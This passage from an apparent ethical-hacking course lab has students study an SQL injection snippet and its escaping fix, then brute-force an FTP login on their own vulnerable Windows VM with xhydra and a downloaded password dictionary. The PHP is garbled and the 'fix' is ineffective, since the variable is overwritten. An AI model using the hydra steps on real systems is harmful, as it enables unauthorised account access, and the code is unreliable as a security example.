SQL injection attacks are basically in the form of introducing or "injecting" malicious code via the input (form) for the SQL/MYSQL database, in order to gain access to the backend database. There are many different methods of injection attacks. We will demonstrate a fairly common method of injection attack which exploits a weakness for the MYSQL server (that fail to sanitize user input. In this case, the user inserting illegal characters (single quote i) within an established web-based database form.
In this section, we will only expose the student to the concept of an injection attack. You are NOT required to setup the MYSQL server, or run a SQL injection attack on your vulnerable machines...
INSTRUCTIONS:
- Study the following PHP code below:
<?php $user = $_POST['usr']; $user = "anything' OR x='x"; mysql_query("SELECT user,password FROM users WHERE user ' 'anything' or x='x'"); ?>
- How could this code be incorporated with an HTML document (using a form) to perform a database injection attack? Record your answer in your lab log-book.
- View the associated YouTube video in the resources above, and try briefly explained why this type of attack could work. Write your explanation in your lab log-book.
- Now, make the following editing changes to your saved database form (areas to be changed are displayed in bold, red colour:
<?php $user = <span style="color:red;font-weight:bold">mysql_real_escape_string(</span>$_POST['usr']<span style="color:red;font-weight:bold">)</span>; $user = "anything' OR x='x"; mysql_query("SELECT user,password FROM users WHERE user ' 'anything' or x='x'"); ?>
- Try to explain how this last editing session prevented this SQL injection attack. Record your observations/answers in your lab log-book.
- Proceed to Task #4.
Answer Task #3 observations / questions in your lab log book.
Task #4: Password Cracking Attack
In this section, you will learn another technique to crack passwords by
obtaining usernames from e-mail addresses, and then running a password
cracking program to hopefully gain access to an account on a vulnerable Windows server that contains a weak password. Then, after gaining access to the account, we will then use a series of techniques to gain access to the
administrator's account.
INSTRUCTIONS:
- Go to your vulnerable Windows server, create a username called weak that contains a very weak password (no special characters, just words that could be contained in a dictionary).
- How could you obtain usernames (eg. e-mail usernames) for a targetted computer system? (review your labs and notes during the Reconnaissance Phase). Record your answer in your lab log-book.
- Assuming that you have obtained a username (i.e. username: weak) from the reconnaissance phase. We will now be using a tool to gain access to the account on the targeted Windows server.
- We need to download a dictionary file containing many of the weak password combinations to help crack a user's weak password. You can perform a Netsearch in order to save this dictionary as a text file.
Here is a link to various password cracking dictionaries: http://www.skullsecurity.org/wiki/index.php/Passwords
As root, download the compressed file (cain.txt.bz2) to your /root directory. - Decompress the file by issuing the following Linux command: bunzip2 cain.txt.bz2
- To launch the xhydra application as root (unless you are already in root), issue the following Linux command: sudo xhydra
- In the initial application window (ie. Target tab), enter the WINDOWS_IP_ADDR in the Target textbox.
- Under the Protocol list-box, select ftp.
- In the Output Options section, check Be verbose, and check Show Attempts.
- Move to the next screen by clicking on the Passwords tab.
- In the Username section, type the username called weak.
- In the Password section, click on the passwords list radio button, and then click on the passwords list text-box in order to browse to the /root/cain.txt dictionary (on your Kali Linux system) that contains common passwords that you downloaded and decompressed.
- At the bottom of the screen, check Try login as password, and click Try Empty Password.
- Click on the Start tab, and click on the Start button (at the bottom of the screen) to begin the attack.
- This attack may take several minutes to complete.
- Check the output from the Password Cracking Attempt. Did it list any usernames and passwords? If so, record the information in your lab log-book.
- What sort of harm can be done to this organization if the root account has been hacked?
- What sort of password rules should be used to make it harder to penetrate this system?
- Record your findings in your lab log-book.
- Proceed to the "Completing the Lab".
Answer Task #4 observations / questions in your lab log book.
Completing the Lab
Arrange evidence for each of these items on your screen, then ask your instructor to review them and sign off on the lab's completion:
- Proof of Windows VM hack from Phishing / Malicious Code.
- Packet Sniffing information from Linux to Windows FTP connection.
- Demonstation of prevention from Data Injection Attack.
- Completed Lab 4 notes.
Preparing for Quizzes
- Briefly explain the purpose of a Phishing Attack. How can phishing relate to using malicious code?
- Define the term Man in the Middle attack.
- Briefly list the steps in a Database Injection attack.
- How can a dictionary file be used to crack passwords on a targeted server?
- What is a password hash? How can a password hash be cracked?
- What can an organization do to prevent passwords on their computer system from being cracked?